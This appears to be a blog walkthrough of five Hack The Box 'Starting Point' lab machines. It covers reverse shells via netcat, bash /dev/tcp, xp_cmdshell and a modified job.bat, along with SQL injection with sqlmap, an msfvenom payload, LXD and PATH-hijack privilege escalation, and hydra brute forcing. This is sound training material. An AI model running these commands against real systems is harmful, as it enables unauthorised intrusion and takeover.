Hack The Box: Starting Point - Tier 2


Tier 3 of the “Starting Point” series consists of six boxes: Archetype, Oopsie, Vaccine, Included and Markup.


Box 1: Archetype

box arch

This box is tagged “Windows”, “SMB” and “SQL”. It turns out we can login to the Windows shares with a guest account and get a shell from there.

Let’s scan it:

box arch

The nmap discovery script gives a hint that there might be a guest account which is able to authenticate as user. So let’s try it:

box arch

Questions:

  • Which TCP port is hosting a database server? 1433
  • What is the name of the non-Administrative share available over SMB? backups

We can try to log into the backups share and get a prompt:

$ smbclient \\\\10.129.116.192\\backups -U guest

It enables us to download the file prod.dtsConfig which contains a login password in the ConfiguredValue tag:

<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  • What is the password identified in the file on the SMB share? M3g4c0rp123

Now let’s try to login to the Microsoft SQL server with this password. For this purpose the impacket repository1 is very helpful.

We can log in with:

impacket-mssqlclient 'ARCHETYPE/sql_svc':'M3g4c0rp123'@10.129.116 -windows-auth    

We are not able to use standard sql-commands such as show databases; however the help command shows that we can execute commands by calling the xp_cmdshell.

  • What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server? mssqlclient.py
  • What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? xp_cmdshell

With this, we can browse the directories and get the user flag. Now let’s try to get the root flag as well. For this we need to escalate to administrator privileges.

I tried to upload winpeas.exe to the server, but couldn’t execute it because of missing privileges. So first of all, let’s escalate our xp_cmdshell with help of the commands specified in this cheatsheet2.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure; - Enabling the sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Instead of running winpeas on the server directly, let’s try to establish a netcat session first. For this, we can download nc.exe to the svc_sql user’s folder. First we establish a HTTP server on our local folder and open the listener:

$ python3 -m http.server 80
$ sudo nc -lnvp 443

And then download it to the server and call it:

SQL> xp_cmdshell curl http://10.10.14.71/nc.exe --output C:\Users\sql_svc\nc.exe
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc; .\nc.exe -e cmd.exe 10.10.14.71 443"

Now we have a shell! Now let’s run winpeas again. We need to download it by clicking on the “raw” file (this was where I went wrong before). Then we upload it and run it just like before with nc.exe. It returns a lot of output, among others a readable console history file.

box arch

When we open it, we get the admin password.

box arch

  • What script can be used in order to search possible paths to escalate privileges on Windows hosts? winpeas
  • What file contains the administrator’s password? MEGACORP_4dm1n!!

With this, we can log in as admin user using the Impacket psexec.py package and find the root flag on the administrator’s desktop.

$ impacket-psexec administrator@10.129.116.192  
  • Submit user flag - Try by yourself!
  • Submit root flag - Try by yourself!

Box 2: Oopsie

box oopsie

This box is tagged “Linux”, “Web”, “PHP” and “SUID”. It turns out we can log into the web application by modifying the cookies, then upload a reverse shell and use the suid bit of a Linux binary to get root privileges.

Questions:

  • With what kind of tool can intercept web traffic? Proxy

box oopsie

We see that there is a web service running on port 80. It is showing us a landing page of a company called “MegaCorp”. There is a hint that we might be able to login (“Please login to get access to the service”), but the login button is nowhere to be found.

box oopsie box oopsie

dirb and gobuster don’t find any path either. So let’s check it with a Burp proxy as the last question suggested. Under the “Target” tab we can check the page’s sitemap:

box oopsie

Besides the css/, themes/ and js/ folders that were already found with dirb, we also find a very interesting cdn-cgi/login link, which leads us to a login page.

box oopsie

  • What is the path to the directory on the webserver that returns a login page? cdn-cgi/login
  • What can be modified in Firefox to get access to the upload page? cookie

The page offers the opportunity to login as guest, so let’s do this and check what happens behind the scenes in Burp. We get re-directed to a page called login/admin.php. It shows the “Repair Management System”. It seems that we might be able to login as admin user if we find the right user/role combination.

box oopsie

We can send it to Burp Intruder and test all numbers from 1 to 100 for the role “admin”. In order to generate a file with all numbers, we can use a little shell script.

i=0
while [ $i -le 200 ]
do
   echo $i >> numbers.txt
   i=$(($i+1))
done

Then we can read the numbers.txt file to Burp. This will test the user-numbers 0 to 200 in combination with the usernames “admin”, “superadmin” and “administrator”. However, all of these tests run unsuccessful, so let’s return to the page and check some more. Interestingly, we can check a page called accounts, which simply passes the account ID using a GET request in the URL.

box oopsie

The account ID is not equal to the access ID. It turns out we can change the ID and return arbitrary results - most importantly, the admin user with id 1 and access ID 34322.

box oopsie

  • What is the access ID of the admin user? 34322

Whit this knowledge, we can modify our cookie to login as admin user with help of the Match & Replace utility in Burp. Now we can view the “Upload” panel which required admin rights. If we upload an arbitrary file, we don’t see where it has been uploaded.

However, our previous scan with dirb revealed that there is a folder called uploads. In this folder, we can access the document (test.jpg) under its plaintext name.

box oopsie

  • On uploading a file, what directory does that file appear in on the server? uploads/

This calls for a shell. Since the website is running on PHP, let’s try to upload a PHP reverse shell, for example the White Winter Wolf interactive shell2. It is accepted, and when we visit the uploads-Folder, we get a webshell. Now we can search the directory for interesting files.

box oopsie Ö which nc reveals that the server has netcat installed. However it turns out that -c and -e options are disabled so that we can’t connect to the outside. Instead, let’s use a different webshell, php-reverse-shell from the /usr/shared folder. Using this, we immediately get a shell on the system and can read the user flag from Robert. Before that, we spawn the shell to a full tty with python3 -c 'import pty; pty.spawn("/bin/sh")'.

Also, we find some MySQL connection info in the db.php file of the www directory:

<?php
   $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

It turns out that we can log in as user robert with su - robert and this password.

  • What is the file that contains the password that is shared with the robert user? db.php

Let’s investigate the robert user further. He belongs to the group bugtracker:

$ groups robert
robert : robert bugtracker

(better enumeration is with id). sudo -l shows that he has no sudo-permissions on the system. Let’s see if the bugtracker group is more powerful.

$ find / -group bugtracker 2>/dev/null

reveals all files that belong to the bugtracker group. In our case it’s only one,/usr/bin/bugtracker. We can try to modify that one, and it has the “s”-bit set for Set User Id Upon Execution (setuid).

$ ls -l /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker

$ file /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped

The setuid means that the program is running with root privileges even if it is started as user robert, because a file with SUID always executes as the user who owns the file (regardless of the user passing the command).

  • What executible is run with the option “-group bugtracker” to identify all files owned by the bugtracker group? find
  • Regardless of which user starts running the bugtracker executable, what’s user privileges will use to run? root
  • What SUID stands for? Set owner User ID

Let’s run the script to see what it does:

box oopsie

It collects some data out of files. Let’s try it again with a less likely number:

box oopsie

And we see that the program calls the cat command. Note that it only calls cat, not /bin/cat. This means that we might be able to overwrite the cat command by a local command when we add the command directory to the beginning of the path.

The current path is:

robert@oopsie:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

so let’s add a local path tmp with a new binary.

robert@oopsie:~$ export PATH=/tmp:$PATH

Now the tmp folder is searched before the /bin folder. There we create a file cat with the following content: /bin/sh and make it executable. Now we get the root shell and can submit the root flag.

  • What is the name of the executable being called in an insecure manner? cat
  • Submit user flag - Try by yourself!
  • Submit root flag - Try by yourself!

Box 3: Vaccine

box vaccine

This box is tagged “Linux”, “FTP”, “SQL” and “SUID”.

box vaccine

The nmap scan shows that there is an FTP server which allowes anonymous login and provides a file called backup.zip. We can download it and try to unzip, but it requires a password.

box vaccine

  • Besides SSH and HTTP, what other service is hosted on this box? FTP
  • This service can be configured to allow login with any password for specific username. What is that username? anonymous
  • What is the name of the file downloaded over this service? backup.zip

Also, we have a Webserver on port 80 called “MegaCorp Login” with a login page. I tried to bomb it with the default credentials, but there was no hit.

So let’s go back to the backup.zip-file and try to crack it. We can use zip2john for this, following this tutorial3. First we generate the hash file, and then we crack it using the standard wordlist from john.

$ zip2john backup.zip > hash.txt
$ john hash.txt
$ unzip backup.zip

The password is 741852963 (= a pattern on a num pad).

  • What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? zip2john

And in the backup file, we find a hard-coded password:

<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
    }
  }
?>

Let’s see if it still works. First we need to convert the md5 hash back to a plain text password. Let’s use hashcat for this. First we double-check that the password is really an md5 using hashid -m <hash>. Then we can run it first with a short list, but without success. Howevr, with rockyou.txt we get the answer within seconds.

box vaccine

  • What is the password for the admin user on the website? qwerty789

We get redirected to the dashboard. There we get a table with database output. The search string is submitted via an URL parameter.

box vaccine

Let’s see if SQL injection is possible here. For example, we can enumerate the number of columns by injecting ' ORDER BY X-- -. With 6, we get an error message:

box vaccine

But we can also do it the easy way and use sqlmap. With this command, we get a shell as postgres user:

$ sqlmap -u 'http://10.129.117.4/dashboard.php' --data 'search=P' --cookie='PHPSESSID=ton2h67hjn3plqh6r9k496dpe0' --os-shell   
  • What option can be passed to sqlmap to try to get command execution via the sql injection? --os-shell

Then we get a very simple shell, but we need to expand it. Unfortunately most commands from this cheatsheet don’t work, and calling a shell with netcat doesn’t work either although it’s installed on the server. However we can get a shell with the following bash command:

os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.71/443 0>&1"

After that we can stabilize the shell with python3 -c 'import pty; pty.spawn("/bin/bash")'. From there we can get the user flag. Now let’s see if we can find any password, because often the database is connected from PHP using a cleartext password. And indeed, we find it in the www folder in the dashboard.php file:

try { $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!"); }    

Maybe the local user postgres is using the same password. Let’s try by calling sudo -l, which should deliver us all executables that the user is allowed to use.

box vaccine

Nice! According to GTFOBins, we can spawn a root shell with this. Let’s run the command: sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf. The output is rather strange as we don’t have a fully functional terminal, but typing :!/bin/sh works anyway and we get a root shell.

  • What program can the postgres user run as root using sudo? vi
  • Submit user flag - Try by yourself!
  • Submit root flag - Try by yourself!

Box 4: Included

box included

This box is tagged “Linux”, “FTP”, “Java”, “PHP” and “LFI”.

The regular Top-1000 nmap scan is returning only a webserver on port 80. Since the next question is asking for a UDP port, let’s check that additionally.

box included

Scanning for the top 100 UDP ports returns a dhcpc service on port 68 and a tftp service on port 69.

box included

We can access the service without password, but directory listing is not possibe and thus we don’t know which files could potentially be downloaded.

  • What service is running on the target machine over UDP? TFTP

Next, let’s check the webserver running on port 80. The start page already shows that some file is included.

box included

It turns out we can even access files outside of the web directory.

box included

  • What class of vulnerability is the webpage that is hosted on port 80 vulnerable to? local file inclusion

In order to exploit the vulnerability, we further enumerate the server. gobuster doesn’t reveal any further interesting directories, but reveals that the files .htaccess and .htpasswd might exist on the server.

box included

And correct, we find the credentials for the user Mike in cleartext in the .htpasswd file.

box included

Besides the password file, we might also use the open TFTP server to upload a webshell and execute it via the LFI. Let’s create a shell with meterpreter:

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.16.18 LPORT=4444 -f raw > shell.php

Before we upload the shell, we need to remove the comment from the beginning of the file and add a ?> to the end. Next, we upload this shell to the TFT server (with put shell.php) and start the listener with msfconsole. Then we access the file at ?file=/var/lib/tftpboot/shell.php, but unfortunately the session fails.

Next try is with the /usr/share/webhsells/php/php-reverse-shell.php from Kali Linux. This one works and we get a shell:

box included

  • What is the default system folder that TFTP uses to store files? /var/lib/tftpboot
  • Which interesting file is located in the web server folder and can be used for Lateral Movement? .htpasswd

Now let’s login as user Mike and see what else we can do there. sudo -l returns nothing helpful, but Mike is part of the lxd-group. We will see how to use that.

  • What is the group that user Mike is a part of and can be exploited for Privilege Escalation? lxd

According to this article4, we can escalate to root privileges if we follow the steps described there.

  • When using an image to exploit a system via containers, we look for a very small distribution. Our favorite for this task is named after mountains. What is that distribution name? alpine

These are teh steps: On our machine, we download the alpine image and create the tar.gz-File.

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

Then we start a python web server on our machine and fetch the file with wget from the victim machine. After that we follow the commands from the blog post and get root privileges.

lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
  • What flag do we set to the container so that it has root privileges on the host system? security.privileged=true
  • If the root filesystem is mounted at /mnt in the container, where can the root flag be found on the container after the host system is mounted? /mnt/root/root
  • Submit user flag - Try by yourself!
  • Submit root flag - Try by yourself!

Box 5: Markup

box markup

This box is tagged “Windows” and “XXE”.

The nmap scan reveals a web server on port 80 and 443 as well as a SSH server on port 22.

box markup

  • What version of Apache is running on the target’s port 80? 2.4.41

Visiting the website, we see a login page.

box markup

We can catch the POST-Request to the webserver with Burp Suite. We see that it uses the payload username=xx&password=yy and returns “Wrong Credentials” if the password is wrong.

box markup

We can feed this information into hydra and run a brute force scan. After a few trials, we get a hit.

$ hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwo
rds/Common-Credentials/best15.txt 10.129.108.32 http-post-form "/:username=^USER^&password=^PASS^:Wrong Credentials"  -V  

The combination that works is admin:password.

  • What username:password combination logs in successfully? admin:password

We get to a very simple shop system. The “Order” tab is accepting user input.

box markup

Let’s see how it looks like in Burp:

box markup

The user input is processed as XML-data. So maybe we can use XXE Injection attack (XML External Entity) on that.

  • What is the word at the top of the page that accepts user input? order
  • What XML version is used on the target? 1.0
  • What does the XXE / XEE attack acronym stand for? XML External Entity

But first, let’s enumerate further. We can find a user “Daniel” in the source code:

box markup

Who knows, maybe Daniel still has an account on the server?

  • What username can we find on the webpage’s HTML code? Daniel

Now let’s try to exploit the XXE. Here are some useful payloads. Unfortunately I didn’t manage to get this without the walkthrough, because I was trying a little different payload and a different file.

Next, we can try to see if “Daniel” has an account on the machine, and if we might even be able to access his ssh-keys. And yes, it works:

box markup

We copy the content to a file and adjust the permissions with chmod 600 id_rsa. Then we can login:

$ ssh daniel@10.129.108.32 -i id_rsa

After a bit of poking, we find an interesting folder called “log-management” with a bat-file inside.

box markup

  • What is the file located in the Log-Management folder on the target? job.bat

This is the file content:

box markup

We can see that it calls the executable wevutil.exe without specifying the path, and it uses administrator privileges. Let’s double-check the privileges with icacls:

box markup

  • What executable is mentioned in the file mentioned before? wevutil.exe

Since we have full writing permissions on the file, we can modify it to execute our own program, for example netcat. First we get nc.exe to the victim machine. Then we simply overwrite the job.bat file with our content.

PS > wget http://10.10.16.18/nc64.exe -O nc.exe
PS > echo "C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.18 443" > C:\Log-Management\job.bat
PS > type job.bat
C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.18 443 

In the beginning I tried the exploit with the nc.exe file from the /usr/share/windows-resources/binaries/ folder on Kali, but it didn’t work. So I downloaded nc64.exe from Github. After a few seconds, I received the shell.

  • Submit user flag - Try by yourself!
  • Submit root flag - Try by yourself!